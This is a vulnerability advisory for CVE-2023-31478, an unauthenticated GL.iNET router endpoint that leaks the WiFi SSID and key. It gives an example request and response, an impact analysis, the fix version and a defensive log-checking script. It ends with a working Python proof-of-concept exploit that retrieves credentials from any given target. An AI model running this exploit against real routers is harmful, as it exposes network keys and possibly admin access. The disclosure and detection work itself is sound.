CVE-2023-31478: GL.iNET SSID Key Disclosure


  • CVSS Score - 8.3, High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L)
  • Overview - An API endpoint for all GL.iNET devices reveals information about the WiFi configuration, including SSID and key. This endpoint can be accessed without any sort of authentication (although the 4.x firmware documentation claims authentication is required). Affects versions <= 3.215. Example request and response below:
POST /api/router/mesh/status HTTP/1.1
Host: 192.168.8.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 4

mac=

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 143
Connection: close
Date: Thu, 29 Dec 2022 21:51:13 GMT
Server: lighttpd/1.4.48

{"del":"0","led":"1","led_sync":"0","wifi_sync":"0","ssid":"GL-XE300-343","key":"goodlife","encryption":"psk2","version":"3.214","code":0}
  • Description - The endpoint /api/router/mesh/status is not listed in the front-end of the web GUI for all GL.iNET devices
  • Steps to reproduce - run the Proof of Concept in the PoC section below using python3 exploit.py <domain/IP>, such as python3 exploit.py 192.168.8.1. Information will be returned such as {'del': '0', 'led': '1', 'led_sync': '0', 'disabled': '2G', 'wifi_sync': '0', 'ssid': 'GL-XE300-343', 'key': 'goodlife', 'encryption': 'psk2', 'version': '3.215', 'code': 0}
  • Impact
    • Since this exploit isn’t very useful in default configurations for GL.iNET devices, a section on impact is needed. By default (on the device I’ve looked at), firewall rules block anything coming from the WAN side, meaning the only way to access the Web GUI is to already be on the LAN, which means the SSID key is already known.
    • However, this exploit is still relevant in non-standard configurations, such as ones where access to the Web GUI is enabled without having to be on the LAN (such as opening up the WAN firewall). This may allow an attacker to connect to the internal LAN.
    • In addition, the SSID key may be related to (or the same as) the admin password for the Web GUI. In this case, sending a simple request would give you admin access to the router.
    • Note that a search on Shodan gives over 1000 results, which means that (as of January 2023) there are at least 1000 vulnerable GL.iNET routers reachable by anyone around the world, with many more in other scenarios.

Fix

This was fixed in version 3.216 by removing the /api/router/mesh/status endpoint from the list of unauthenticated endpoints.
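From the defender's side, the two useful checks are whether a device's reported firmware predates the 3.216 fix and whether the endpoint is being hit from outside the LAN (the non-default exposure described under Impact). The following is an added example, not code from the advisory or from GL.iNET; it assumes the web server writes an access log in common log format and that the LAN is the default 192.168.8.0/24. The sample log lines are constructed.

```python
import ipaddress
import re
from typing import Iterable, List, Tuple

# Endpoint that CVE-2023-31478 exposed without authentication on firmware <= 3.215.
VULN_ENDPOINT = "/api/router/mesh/status"
FIXED_VERSION = (3, 216)  # first firmware that requires authentication for the endpoint

# Constructed sample lines in common log format (assumed format; not real device logs).
SAMPLE_LOG = """\
192.168.8.100 - - [29/Dec/2022:21:51:13 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143
203.0.113.45 - - [29/Dec/2022:22:02:07 +0000] "POST /api/router/mesh/status HTTP/1.1" 200 143
192.168.8.100 - - [29/Dec/2022:22:05:41 +0000] "POST /api/router/login HTTP/1.1" 200 87
198.51.100.7 - - [29/Dec/2022:22:09:30 +0000] "GET / HTTP/1.1" 200 512
"""

# client_ip, ident, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def is_affected(version: str) -> bool:
    """True when a firmware version string such as '3.214' predates the 3.216 fix."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    return parts < FIXED_VERSION


def find_wan_status_requests(lines: Iterable[str],
                             lan_cidr: str = "192.168.8.0/24") -> List[Tuple[str, str]]:
    """Return (client_ip, timestamp) for every mesh/status request from outside the LAN."""
    lan = ipaddress.ip_network(lan_cidr)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as common log format
        ip, ts, _method, path, _status = m.groups()
        if path == VULN_ENDPOINT and ipaddress.ip_address(ip) not in lan:
            hits.append((ip, ts))
    return hits


if __name__ == "__main__":
    print("3.214 affected:", is_affected("3.214"))
    for ip, ts in find_wan_status_requests(SAMPLE_LOG.splitlines()):
        print(f"[!] WAN-side request to {VULN_ENDPOINT} from {ip} at {ts}")
```

A WAN-side hit on a device that still reports an affected version is the case to treat as a probable SSID key disclosure.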

PoC

import requests, sys
import warnings
warnings.filterwarnings("ignore")  # silence the InsecureRequestWarning caused by verify=False


## Get arguments
if len(sys.argv) < 2:
    print("Usage: python3 exploit.py <domain/IP>")
    sys.exit(1)

url = sys.argv[1]


## Send request
# An empty "mac" parameter is all the endpoint needs; no session cookie is sent
data = "mac="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
try:
    response = requests.request("POST", "https://" + url + "/api/router/mesh/status",
                                verify=False, timeout=4, data=data, headers=headers)
except requests.exceptions.RequestException as e:
    print("[-] Could not reach target: " + str(e))
    sys.exit(1)


## Check response
# A "code" of -1 is treated as the endpoint refusing the unauthenticated call
try:
    result = response.json()
    if result["code"] == -1:
        print("[-] Machine not vulnerable")
    else:
        print(result)
except (ValueError, KeyError):
    print("[-] Machine not vulnerable, error was encountered")